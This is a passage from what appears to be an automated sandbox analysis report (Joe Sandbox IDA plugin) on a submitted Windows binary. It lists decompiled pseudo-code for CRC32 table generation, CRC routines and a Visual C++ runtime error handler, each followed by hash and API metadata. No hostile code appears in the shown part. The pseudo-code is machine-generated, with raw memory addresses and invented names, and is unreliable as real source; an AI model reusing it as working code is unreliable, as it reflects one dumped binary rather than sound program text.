!((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 
0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ 
_t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 
0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) 
- 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 
0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ 
_t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
                                          					_t72 = _t72 + 1;
                                          				} while (_t72 < 0x100);
                                          				while(_t72 < 0x800) {
                                          					_t38 =  *(0x4232c0 + _t72 * 4);
                                          					_t72 = _t72 + 1;
                                          					 *(0x4236bc + _t72 * 4) = _t38 >> 0x00000008 ^  *(0x4236c0 + (_t38 & 0x000000ff) * 4);
                                          				}
                                          				 *0x42333c = 0x418fd0;
                                          				_t37 = E00411420();
                                          				if(_t37 == 0) {
                                          					 *0x42333c = 0x418ef0;
                                          					return _t37;
                                          				}
                                          				return _t37;
                                          			}







                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                                          • Instruction ID: b54c2cd6cfa36051406bb29028bc26d5c271240bfac9ba2f52dccebc7510b76a
                                          • Opcode Fuzzy Hash: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                                          • Instruction Fuzzy Hash: 52214F3E370D0607A71C8B69AD336B921D2E38430A7C8A03DE68BC53D1EE6CD595860D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00418EF1(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
                                          				signed char _t42;
                                          				signed int _t44;
                                          				signed int _t50;
                                          				signed int _t51;
                                          				unsigned int _t59;
                                          				signed char _t60;
                                          				signed int _t62;
                                          				void* _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t67;
                                          				signed int _t69;
                                          				signed int _t73;
                                          				signed int _t83;
                                          				intOrPtr _t86;
                                          
                                          				_t62 = __edx;
                                          				_t42 = __ecx;
                                          				_t65 = _a8;
                                          				_t86 = _a12;
                                          				if(_t65 != 0) {
                                          					while((_t62 & 0x00000007) != 0) {
                                          						_t83 =  *_t62 & 0x000000ff;
                                          						_t62 = _t62 + 1;
                                          						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
                                          						_t65 = _t65 - 1;
                                          						if(_t65 != 0) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					if(_t65 >= 0x10) {
                                          						_t67 = _t65 + _t62;
                                          						_a8 = _t67;
                                          						_t69 = _t67 - 0x00000008 & 0xfffffff8;
                                          						_t63 = _t62 - _t69;
                                          						_t44 = _t42 ^  *(_t63 + _t69);
                                          						_t59 =  *(_t63 + _t69 + 4);
                                          						do {
                                          							_t50 = _t59 & 0x000000ff;
                                          							_t51 = _t59 & 0x000000ff;
                                          							_t60 = _t59 >> 0x10;
                                          							_t59 =  *(_t63 + _t69 + 0xc);
                                          							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
                                          							_t63 = _t63 + 8;
                                          						} while (_t63 != 0);
                                          						_t42 = _t44 ^  *(_t63 + _t69);
                                          						_t62 = _t69;
                                          						_t65 = _a8 - _t62;
                                          						L7:
                                          						while(_t65 != 0) {
                                          							_t73 =  *_t62 & 0x000000ff;
                                          							_t62 = _t62 + 1;
                                          							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
                                          							_t65 = _t65 - 1;
                                          						}
                                          						return _t42;
                                          					}
                                          				}
                                          				goto L7;
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                          • Instruction ID: d8f843b74cbd450328ce6fa4395b1e87caa1541ea2f4e00bece6a97874f35350
                                          • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                          • Instruction Fuzzy Hash: 9F21D7329046254BCB42DE6EE4845A7F392FBC437AF23472BED8467290C638E855D6A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00418FCB(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed char _t39;
                                          				signed int _t41;
                                          				signed int _t63;
                                          				void* _t64;
                                          				intOrPtr _t65;
                                          				intOrPtr _t66;
                                          				signed int _t68;
                                          				signed int _t70;
                                          				signed int _t74;
                                          				intOrPtr _t76;
                                          
                                          				_t63 = __edx;
                                          				_t39 = __ecx;
                                          				_t65 = _a4;
                                          				_t76 = _a8;
                                          				if(_t65 != 0) {
                                          					while((_t63 & 0x00000007) != 0) {
                                          						_t74 =  *_t63 & 0x000000ff;
                                          						_t63 = _t63 + 1;
                                          						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
                                          						_t65 = _t65 - 1;
                                          						if(_t65 != 0) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					if(_t65 >= 0x10) {
                                          						_t66 = _t65 + _t63;
                                          						_a4 = _t66;
                                          						_t68 = _t66 - 0x00000008 & 0xfffffff8;
                                          						_t64 = _t63 - _t68;
                                          						_t41 = _t39 ^  *(_t64 + _t68);
                                          						do {
                                          							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
                                          							_t64 = _t64 + 8;
                                          						} while (_t64 != 0);
                                          						_t39 = _t41 ^  *(_t64 + _t68);
                                          						_t63 = _t68;
                                          						_t65 = _a4 - _t63;
                                          						L8:
                                          						while(_t65 != 0) {
                                          							_t70 =  *_t63 & 0x000000ff;
                                          							_t63 = _t63 + 1;
                                          							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
                                          							_t65 = _t65 - 1;
                                          						}
                                          						return _t39;
                                          					}
                                          				}
                                          				goto L8;
                                          			}














                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                          • Instruction ID: adcd1020660a0caec7aa531f2501062eb824b7187074cdff0887c6cd02d8138b
                                          • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                          • Instruction Fuzzy Hash: EF21377291442587C701DF1DE4986B7B7E1FFC8319F678B2BD9818B180CA39DC81D690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E00417836(void* __edi, long _a4) {
                                          				char _v164;
                                          				char _v424;
                                          				int _t17;
                                          				long _t19;
                                          				signed int _t42;
                                          				long _t47;
                                          				void* _t48;
                                          				signed int _t54;
                                          				void** _t56;
                                          				void* _t57;
                                          
                                          				_t48 = __edi;
                                          				_t47 = _a4;
                                          				_t42 = 0;
                                          				_t17 = 0x422a58;
                                          				while(_t47 !=  *_t17) {
                                          					_t17 = _t17 + 8;
                                          					_t42 = _t42 + 1;
                                          					if(_t17 < 0x422ae8) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t54 = _t42 << 3;
                                          				_t2 = _t54 + 0x422a58; // 0x2c000000
                                          				if(_t47 ==  *_t2) {
                                          					_t17 =  *0x423348; // 0x0
                                          					if(_t17 == 1 || _t17 == 0 &&  *0x420734 == 1) {
                                          						_t16 = _t54 + 0x422a5c; // 0x41bd2c
                                          						_t56 = _t16;
                                          						_t19 = E004144D0( *_t56);
                                          						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                                          					} else {
                                          						if(_t47 != 0xfc) {
                                          							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                                          								E00418230( &_v424, "<program name unknown>");
                                          							}
                                          							_push(_t48);
                                          							_t49 =  &_v424;
                                          							if(E004144D0( &_v424) + 1 > 0x3c) {
                                          								_t49 = E004144D0( &_v424) +  &_v424 - 0x3b;
                                          								E004183B0(E004144D0( &_v424) +  &_v424 - 0x3b, "...", 3);
                                          								_t57 = _t57 + 0x10;
                                          							}
                                          							E00418230( &_v164, "Runtime Error!\n\nProgram: ");
                                          							E00418240( &_v164, _t49);
                                          							E00418240( &_v164, "\n\n");
                                          							_t12 = _t54 + 0x422a5c; // 0x41bd2c
                                          							E00418240( &_v164,  *_t12);
                                          							_t17 = E00418320( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                                          						}
                                          					}
                                          				}
                                          				return _t17;
                                          			}














                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004178A3
                                          • GetStdHandle.KERNEL32(000000F4,0041BD2C,00000000,00000000,00000000,?), ref: 00417979
                                          • WriteFile.KERNEL32(00000000), ref: 00417980
                                          Strings
                                          Similarity
                                          • API ID: File$HandleModuleNameWrite
                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $X*B$*B
                                          • API String ID: 3784150691-2787626558
                                          • Opcode ID: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                                          • Instruction ID: 83e6cc08efc147308ddc610541e3e7ace00831554afff49654370310fabd765f
                                          • Opcode Fuzzy Hash: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                                          • Instruction Fuzzy Hash: 6E310472A00218AFEF20E660DD45FDA737DEB45344F5000ABF544D6140EBBCAAC58BAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 61%
                                          			E0041881D(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
                                          				signed int _v8;
                                          				intOrPtr _v20;
                                          				short* _v28;
                                          				int _v32;
                                          				short* _v36;
                                          				short* _v40;
                                          				int _v44;
                                          				void* _v60;
                                          				int _t61;
                                          				int _t62;
                                          				int _t82;
                                          				int _t83;
                                          				int _t88;
                                          				short* _t89;
                                          				int _t90;
                                          				void* _t91;
                                          				int _t99;
